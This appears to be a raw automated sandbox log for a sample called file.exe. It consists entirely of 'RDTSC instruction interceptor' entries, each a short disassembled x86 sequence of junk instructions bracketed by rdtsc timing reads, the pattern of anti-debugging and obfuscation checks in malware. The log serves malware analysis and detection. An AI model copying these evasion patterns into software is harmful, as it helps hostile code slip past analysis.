                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1315811 second address: 1315849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 jg 00007FF6744C8C9Eh 0x0000000d nop 0x0000000e mov dword ptr [ebp+122DB830h], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 jmp 00007FF6744C8C9Dh 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13159B9 second address: 13159D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131691E second address: 1316992 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bl, F0h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov edi, dword ptr [ebp+122D1B9Eh] 0x0000001a je 00007FF6744C8C97h 0x00000020 stc 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov dword ptr [ebp+122D1AD0h], ebx 0x0000002e mov eax, dword ptr [ebp+122D16E5h] 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007FF6744C8C98h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e add dword ptr [ebp+122D361Fh], edx 0x00000054 sub dword ptr [ebp+122D2AADh], esi 0x0000005a push FFFFFFFFh 0x0000005c sub ebx, dword ptr [ebp+122D1AD6h] 0x00000062 push eax 0x00000063 pushad 0x00000064 jns 00007FF6744C8C98h 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13159D2 second address: 13159D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13159D8 second address: 13159EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FF6744C8C9Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13159EF second address: 1315A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D3663h], eax 0x00000010 mov dword ptr [ebp+122D1847h], edi 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov ebx, dword ptr [ebp+122D369Eh] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FF674E409B8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov eax, dword ptr [ebp+122D16F5h] 0x0000004a push FFFFFFFFh 0x0000004c add dword ptr [ebp+122D2E88h], esi 0x00000052 nop 0x00000053 pushad 0x00000054 jnl 00007FF674E409BCh 0x0000005a pushad 0x0000005b jnc 00007FF674E409B6h 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A54E second address: 131A55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6744C8C9Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A626 second address: 131A62C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A62C second address: 131A631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131B706 second address: 131B70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131B8EE second address: 131B8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131C7DA second address: 131C7E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E5C3 second address: 131E5ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF6744C8CA2h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131C7E0 second address: 131C805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E5ED second address: 131E5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131C805 second address: 131C80B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E5F3 second address: 131E5F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7D5E second address: 12C7D64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7D64 second address: 12C7D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324F0B second address: 1324F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324F17 second address: 1324F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF6744C8C96h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324F22 second address: 1324F35 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007FF674E409B6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324F35 second address: 1324F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FF6744C8CA4h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324654 second address: 1324691 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF674E409BEh 0x00000008 jmp 00007FF674E409C7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FF674E409C2h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324AAF second address: 1324ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8C9Ch 0x00000007 jmp 00007FF6744C8CA5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324ADC second address: 1324AF2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF674E409BAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FF674E409B6h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324AF2 second address: 1324AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132FCAA second address: 132FCBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pushad 0x00000009 je 00007FF674E409B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1330268 second address: 133026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133026D second address: 1330273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1330273 second address: 1330277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13307B5 second address: 13307BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13307BD second address: 13307C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2C74 second address: 12C2CCF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF674E409B6h 0x00000008 jno 00007FF674E409B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jc 00007FF674E409B6h 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jp 00007FF674E409CCh 0x00000020 pushad 0x00000021 jmp 00007FF674E409C2h 0x00000026 pushad 0x00000027 popad 0x00000028 jmp 00007FF674E409BEh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1330ABC second address: 1330AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1330AC0 second address: 1330AD9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF674E409C3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1330AD9 second address: 1330B02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF6744C8C96h 0x00000009 jmp 00007FF6744C8CA0h 0x0000000e popad 0x0000000f pushad 0x00000010 jp 00007FF6744C8C96h 0x00000016 jns 00007FF6744C8C96h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1330C62 second address: 1330C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133254F second address: 1332558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13387DB second address: 13387E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13387E4 second address: 13387EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13387EA second address: 13387F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF674E409B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133778A second address: 133778F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13378C3 second address: 13378F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FF674E409C7h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF674E409C6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13378F9 second address: 1337907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337907 second address: 1337912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF674E409B6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337BA8 second address: 1337BAE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337BAE second address: 1337BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF674E409C6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338190 second address: 1338194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133DC70 second address: 133DCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF674E409B6h 0x0000000a jmp 00007FF674E409C9h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 jmp 00007FF674E409C6h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FFF44 second address: 12FFF9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub edx, dword ptr [ebp+122D37ECh] 0x00000010 mov ecx, esi 0x00000012 lea eax, dword ptr [ebp+12471C90h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FF6744C8C98h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov edx, dword ptr [ebp+122D391Ch] 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b je 00007FF6744C8C98h 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FFF9C second address: 12E6FE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FF674E409C6h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF674E409BCh 0x00000011 nop 0x00000012 mov dh, C4h 0x00000014 call dword ptr [ebp+122DB7C2h] 0x0000001a push edx 0x0000001b jne 00007FF674E409D9h 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130060C second address: 1300612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13006CF second address: 13006EF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF674E409C4h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1300946 second address: 130094A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130094A second address: 130094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130094E second address: 1300954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1300954 second address: 1300959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301270 second address: 12E7AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FF6744C8C98h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 jnl 00007FF6744C8C9Bh 0x00000029 and dx, 3AE7h 0x0000002e call dword ptr [ebp+122DB81Dh] 0x00000034 jng 00007FF6744C8CB9h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7AEB second address: 12E7AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D2BE second address: 133D2E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007FF6744C8C9Bh 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 je 00007FF6744C8C96h 0x0000001c popad 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D424 second address: 133D42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D42A second address: 133D430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D430 second address: 133D434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D5DB second address: 133D5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D5E1 second address: 133D5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF674E409B6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D5F1 second address: 133D5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF6744C8C96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D5FD second address: 133D605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D74D second address: 133D752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1342038 second address: 1342047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 jo 00007FF674E409B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1342823 second address: 134283E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134283E second address: 1342860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF674E409C2h 0x0000000b popad 0x0000000c push esi 0x0000000d jo 00007FF674E409BEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13429CF second address: 13429E2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jns 00007FF6744C8C96h 0x0000000d pop edi 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1342B36 second address: 1342B73 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF674E409CFh 0x0000000c jmp 00007FF674E409C9h 0x00000011 popad 0x00000012 push esi 0x00000013 jmp 00007FF674E409C1h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134AFF6 second address: 134AFFC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134E14F second address: 134E157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134E157 second address: 134E15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134E15B second address: 134E169 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D9BA second address: 134D9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jp 00007FF6744C8C9Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D9C9 second address: 134D9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D9CF second address: 134D9F6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF6744C8C98h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF6744C8CA9h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1352417 second address: 135243E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF674E409B6h 0x00000008 jmp 00007FF674E409BCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF674E409C1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1356E6F second address: 1356E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135713C second address: 1357155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13572E2 second address: 13572FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF6744C8CA1h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13572FB second address: 1357315 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C5h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135746C second address: 1357476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF6744C8C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357476 second address: 135747C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
